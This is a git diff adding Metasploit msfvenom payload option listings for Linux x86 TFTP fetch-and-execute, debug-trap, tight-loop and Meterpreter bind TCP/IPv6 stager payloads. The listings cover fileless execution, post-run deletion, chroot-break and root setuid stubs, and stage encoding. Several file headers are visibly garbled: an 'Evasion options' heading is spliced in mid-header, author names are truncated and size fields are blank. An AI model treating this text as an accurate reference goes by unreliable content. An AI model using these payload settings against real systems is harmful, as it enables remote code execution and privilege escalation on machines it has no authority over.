+ Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no 
Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-generic-debug_trap.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-debug_trap.txt new file mode 100644 index 0000000..8dced88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-debug_trap.txt 
@@ -0,0 +1,65 @@ + + Name: TFTP Fetch, Generic x86 Debug Trap + Module: payload/cmd/linux/tftp/x86/generic/debug_trap + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + robert + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME akbKBqVoJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Generate a debug trap in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-generic-tight_loop.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-tight_loop.txt new file mode 100644 index 0000000..a321651 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-generic-tight_loop.txt 
@@ -0,0 +1,65 @@ + + Name: TFTP Fetch, Generic x86 Tight Loop + Module: payload/cmd/linux/tftp/x86/generic/tight_loop + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iKsjlklFcfxn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Generate a tight loop in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..76dfa54 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp: +========================= + +iam_webb@rapid7.com> + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rrljDzjxie no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..a964278 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid: +========================= + +bb + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME htYaHzzu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_nonx_tcp.txt new file mode 100644 index 0000000..7057ac5 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_nonx_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp: +========================= + +om> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pzUTdhDd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..4354366 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_tcp: +========================= + + + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME dltZQuwsI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork 
false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp_uuid.txt new file mode 100644 index 0000000..e393635 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-meterpreter-bind_tcp_uuid.txt 
@@ -0,0 +1,102 @@ + + Name: TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid: +========================= + +am Webb + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DWoraWwKGybN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
